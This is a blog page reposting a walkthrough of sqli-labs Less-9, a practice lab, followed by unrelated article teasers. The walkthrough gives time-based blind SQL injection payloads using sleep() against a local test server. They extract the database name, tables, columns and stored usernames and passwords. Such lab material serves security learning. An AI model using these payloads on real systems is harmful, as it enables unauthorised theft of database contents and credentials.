当前位置: 首页 > 编程日记 > 正文

Sqli-labs less 9

编程日记 2024-11-27 18:00:00

Less-9

本关我们从标题就可以看到 《基于时间-单引号》,所以很明显的这关要我们利用延时注入进行,同时id参数进行的是 ' 的处理。这里我们大致的将延时注入的方法演示一次。

这里用sleep()函数。

这里因为我们利用的是时间的延迟,贴图就没有意义了,这里只写payload了:(正确的时候直接返回,不正确的时候等待5秒钟,只贴正确的)

猜测数据库:

http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+

说明第一位是s (ascii码是115)

http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),2,1))=101,1,sleep(5))--+

说明第一位是e (ascii码是101)

....

以此类推,我们知道了数据库名字是security

猜测security的数据表:

http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+

猜测第一个数据表的第一位是e,...依次类推,得到emails

http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114,1,sleep(5))--+

猜测第二个数据表的第一位是r,...依次类推,得到referers

...

再以此类推,我们可以得到所有的数据表emails,referers,uagents,users

猜测users表的列:

http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))--+

猜测users表的第一个列的第一个字符是i,

以此类推,我们得到列名是id,username,password

猜测username的值:

http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))--+

猜测username的第一行的第一位

以此类推,我们得到数据库username,password的所有内容

以上的过程就是我们利用sleep()函数注入的整个过程,当然了可以离开BENCHMARK()函数进行注入,这里可以自行进行测试。我们这里就不进行演示了。

转载于:https://www.cnblogs.com/lcamry/p/5763086.html


https://www.dkcj.cn/info/29374.html

相关文章:

用ASP.NET上传图片并生成带版权信息的缩略图

作者&#xff1a;活靶子 出处&#xff1a;AspxBoy.Com <% Page Language"C#" ResponseEncoding"gb2312" %><% import Namespace"System" %><% import Namespace"System.IO" %><% import Namespace"Sys…

编程日记2024/11/27 17:50:00

服务器ping你可以ping通,你ping服务器ping不同的解决方案!!

这几天让公司的服务器弄的蛋疼啊&#xff01;&#xff01;三天两头的出问题&#xff0c;主管脸色不大好看&#xff0c;我这里也郁闷的要死。所以发誓一定要把好安全关&#xff01;&#xff01; 今天在自己的虚拟机上边装了一个winserver2003标准版&#xff0c;搭建好环境之后发…

编程日记2024/11/27 17:40:00

重磅!CSDN 发布「AI开源贡献奖Top5」「AI新锐公司奖Top10」「AI优秀案例奖Top30」三大榜单...

2020 年无疑是特殊的一年&#xff0c;AI 在开年的这场“战疫”中表现出惊人的力量。站在“新十年”的起点上&#xff0c;CSDN发起【百万人学AI】评选活动。我们继续聚焦AI的技术落地&#xff0c;关注开源和新生的力量。作为CSDN第三届AI评选活动&#xff0c;本次活动受到数百家…

编程日记2024/11/27 17:30:00

linux 模拟生成 CAN 设备

/*************************************************************************************** linux 模拟生成 CAN 设备* 说明&#xff1a;* 最近在看CANopenSocket的过程中看到能够生成模拟的CAN设备&#xff0c;于是查了点资料&#xff0c;结…

编程日记2024/11/27 17:20:00

关于委托的精彩解说

作者&#xff1a;TomMax (笑望人生) 出处&#xff1a;csdn community 主 题&#xff1a; “.net百题问答的活动”--许多人问过的--《 C#委托及事件 》作 者&#xff1a; TomMax (笑望人生) 信 誉 值&#xff1a; 100 所属论坛&#xff1a; .NET技术 C# 问题点数&am…

编程日记2024/11/27 17:10:00

[转载]ESFramework 4.0 快速上手(15) -- 客户端登录验证

ESFramework 4.0 快速上手&#xff08;15&#xff09; &#xff0d;&#xff0d; 客户端登录验证 在之前版本的Rapid引擎中&#xff0c;是没有提供客户端登陆验证的机制的&#xff0c;如果要验证用户的帐号密码信息&#xff0c;我们只有自己手动通过自定义信息来实现。在2011.…

编程日记2024/11/27 17:00:00

编程能力差,90%输在了这点上!CTO:这样学编程 ,更容易成为高手

从事 Python 这些年中&#xff0c;我见过很多 Python 教程和书籍&#xff0c;他们大都这样讲 &#xff1a;先介绍 Python 的基本语法规则、list, dict, tuple 等数据结构&#xff0c;然后再介绍字符串处理和正则表达式&#xff0c;介绍文件等 IO 操作.... 就这样一点一点往下说…

编程日记2024/11/27 16:50:00

MVC 之 架构的基本原理及Asp.Net实现MVC

一、引言 许多Web应用都是从数据存储中检索数据并将其显示给用户。在用户更改数据之后&#xff0c;系统再将更新内容存储到数据存储中。因为关键的信息流发生在数据存储和用户界面之间&#xff0c;所以很多应用将数据和用户界面这两部分绑在一起&#xff0c;以减少编码量并提高…

编程日记2024/11/27 16:40:00

vsftp虚拟用户

虚拟用户 1、建立虚拟用户口令库文件 #cat logins.txt mike 123 john 321 口令库文件中奇数行设置用户名&#xff0c;偶数行设置口令 2、生成vsftpd的认证文件 #rpm -ivh db4-utils* #db_load -T -t hash -f /root/logins.txt /etc/vsftpd/vsftpd_login.db 生成认证文件 设置…

编程日记2024/11/27 16:30:00

在asp.net(C#)中怎么获得一个目录的大小?

作者&#xff1a;靶子&MSDN 出处&#xff1a;msdn 本方法来自以下文档,有问题多翻帮助 ;)ms-help://MS.NETFrameworkSDKv1.1.CHS/cpref/html/frlrfsystemiodirectoryclasstopic.htmms-help://MS.VSCC.2003/MS.MSDNQTR.2003FEB.2052/cpref/html/frlrfsystemiodirectory…

编程日记2024/11/27 16:20:00

360金融首席科学家张家兴:我们如何做数据AI融合中台?

2020年7月3—4日&#xff0c;在CSDN 主办的第三届 AI 开发者万人大会&#xff08;AI ProCon 2020&#xff09;上。360金融首席科学家张家兴博士以“数据AI融合中台——金融领域人工智能实践”为题&#xff0c;揭秘了360金融在金融科技领域的前沿技术理念与实践心得。 张家兴认…

编程日记2024/11/27 16:10:00

GoogleFusionTablesAPI初探地图与云计算

http://developer.51cto.com/art/200906/129324.htm http://yexiaochai.iteye.com/blog/1893735 http://yexiaochai.iteye.com/blog/1893734

编程日记2024/11/27 16:00:00

关于ASPNET在IIS一些问题的经验总结

作者&#xff1a;未知 请速与本人联系 出处&#xff1a;mscommunity 很多开发人员对于IIS和ASPNET的安装等问题困扰,特此做下面的小总结,请大家多交流!iis 坏了修复办法!!!!!!! 一般IIS运行不了ASP.NET,试一下下面四种方法&#xff0c;99&#xff05;有效&#xff1a; 1。…

编程日记2024/11/27 15:50:00

好莱坞科幻新片《b》,钦定 AI 机器人出演女主角!

来源 | HyperAI超神经由日本机器人教父石黑浩&#xff0c;历时多年打造的 AI 机器人 Erica&#xff0c;被好莱坞选中&#xff0c;出演科幻大片《b》中的女主角。如果成功完成拍摄&#xff0c;将成为影史上的一大创举。很多好莱坞科幻大片里&#xff0c;都有机器人的角色&#x…

编程日记2024/11/27 15:40:00

原型开发、模型构建和设计反馈在线工具

Lumzy 你在创建新的UI技术任何时候&#xff0c;在创建网站之前&#xff0c;你会需要创造出一个作为概念根据的原型或模型。当然&#xff0c;你也要测试这些新构想。 Lumzy是一个方便的UI界面模型构建和原型开发的小型在线工具。它能让你创建具有工作功能的原型&#…

编程日记2024/11/27 15:30:00

关于静态方法的使用方式

1。静态方法内不能使用非静态的类变量 2。静态方法内不能使用非静态的类方法

编程日记2024/11/27 15:20:00

VS.NET 学习方法论

——我的VS.NET学习之旅 屠恩海&#xff08;SunHai&#xff09;开发工具&#xff1a;Microsoft Visual Studio .NET 2003操作系统&#xff1a;Windows XP题记&#xff1a;即使你没有一点编程经验&#xff0c;只要你愿意&#xff0c;并理解本文介绍的学习方法&#xff0c;你也可…

编程日记2024/11/27 15:10:00

python标准库学习4

>>> os.environ["HOME"] C:\\Users\\Administrator>>> os.getcwd() #获得当前的目录 D:\\new >>> os.getenv("QTDIR") #获取环境变量的值 D:\\vs2010-qt-src-4.7.4\\qt-src-4.7.4 os.putenv(varname, value) #设置环境变量的…

编程日记2024/11/27 15:00:00

通过三个直观步骤理解ROC曲线

作者 | Valeria Cortez来源 | DeepHub IMBAROC曲线是一个分类模型效果好坏评判的的可视化表示。在这篇文章中&#xff0c;我将分三个步骤头开始构建ROC曲线。步骤1&#xff1a;获取分类模型预测当我们训练一个分类模型时&#xff0c;我们得到得到一个结果的概率。在这种情况下&…

编程日记2024/11/27 14:50:00

JAVA 实现 快速排序算法

2019独角兽企业重金招聘Python工程师标准>>> /*** 快速排序* * param list*/public static void fastSorted(int[] list, int i, int j) {if (i > j) {return;}int needToSortLen j;int referIndex i;while (i ! j) {while (list[referIndex] < list[j] &am…

编程日记2024/11/27 14:40:00

Net 下安装、调试的常见问题与错误!!!

作者&#xff1a;多人 出处&#xff1a;csdn Q:新建项目时出错&#xff1a;Visual Studio .NET 已检测到指定Web服务器运行的不是ASP.NET 1.1版。您将无法运行ASP.NET Web应用程序或服务。Ahttp://support.microsoft.com/default.aspx?scidkb;en-us;817267--------------…

编程日记2024/11/27 14:30:00

joomla 1.7遇到的麻烦——不能删除模板的解决办法

虽然最近了解了不少的 joomla 1.7的扩展&#xff0c;但大多都没有什么实战经验&#xff0c;所以从今天开始 准备不同的试用各类插件、并以实战的方式来记录这个过程。不过&#xff0c;在做这些之前&#xff0c;我试用了几个免费的模板&#xff0c;感觉还可以&#xff0c;不过毕…

编程日记2024/11/27 14:20:00

疫情排查节时86%?不会代码也能玩转模型训练?腾讯大神揭秘语音语义及AutoML黑科技 | 内含福利...

出品 | AI科技大本营&#xff08;ID:rgznai100&#xff09;2020年7月3日&#xff0c;AI ProCon 2020 AI开发者万人大会&#xff0c;隆重举行&#xff01;作为CSDN策划并主办的系列技术「开发者大会」之一&#xff0c;本次大会通过线上直播的方式&#xff0c;吸引到了10000开发者…

编程日记2024/11/27 14:10:00

js调用ios的方法

摘要 在做h5应用的时&#xff0c;有时有些功能js并不能实现的特别完美。比如下载进度条或上传文件进度等。如果能调用ios或者android的方法&#xff0c;实现进度&#xff0c;以及文件上传或者下载列表更好一些。如果使用第三方的js插件。又要考虑到ios和android的版本问题&…

编程日记2024/11/27 14:00:00

可以弹出确认对话框的自定义Web服务器控件ConfirmButton

作者&#xff1a;活靶子[原创] 出处&#xff1a;AspxBoy.Com 经常在论坛里看到类似这样的问题&#xff1a;“…如何在点击删除按钮的时候弹出个确认删除对话框”。下面我们来自己写一个这样的自定义Web服务器控件!思路如下&#xff1a;继承System.Web.UI.WebControls.Butt…

编程日记2024/11/27 13:50:00

阿里巴巴副总裁司罗:达摩院如何搭建NLP技术体系?

出品 | AI科技大本营&#xff08;ID:rgznai100&#xff09;司罗把人工智能分为四个层面。在计算智能层面&#xff0c;近年来取得了一定成就&#xff0c;而在更高层面的感知、认知和创造智能上还在探索中。感知智能是指找出自然界的实体&#xff0c;比如找到新闻、故事中的人名、…

编程日记2024/11/27 13:40:00

数字化校园passport

公共表&#xff1a;aspnetdb->membership,role,..... 用户表&#xff1a;用户名&#xff0c;昵称&#xff0c;真实姓名。tel,qq,mobile,email,用户类别 用户类别&#xff1a; 教师 学生 家长 贵宾 校友 网友 学年学期 班级 年级段 备课级组 处室 教师相关表&#xff1a; 任课…

编程日记2024/11/27 13:30:00

fullPage教程 -- 整屏滚动效果插件 fullpage详解

为什么80%的码农都做不了架构师&#xff1f;>>> 本文为 H5EDU 机构官方 HTML5培训 教程&#xff0c;主要介绍&#xff1a;fullPage教程 -- 整屏滚动效果插件 fullpage详解 1、引用文件[html] view plain copy print?在CODE上查看代码片派生到我的代码片 <link …

编程日记2024/11/27 13:20:00

用DataReader还是DataSet?

作者&#xff1a;Jonathan Goodyear 出处&#xff1a;网络 我经常听到有人问这个问题&#xff1a;“在ASP.NET Web应用程序中我应该用DataReader类还是DataSet类呢&#xff1f;”在很多文章以及新闻组的贴子中我经常看到这样的误解&#xff0c;即认为DataReader&#xff…

编程日记2024/11/27 13:10:00

张钹院士:探索第三代人工智能,需要勇闯无人区的人才

整理 | 夕颜出品 | AI科技大本营&#xff08;ID:rgznai100&#xff09;【导读】7 月 3-4 日&#xff0c;由 CSDN 主办的第三届 AI 开发者大会&#xff08;AI ProCon 2020&#xff09;在线上举行。本次大会有超万人报名参与&#xff0c;参与人群覆盖 50 领域、4000 家企业。其中…

编程日记2024/11/27 13:00:00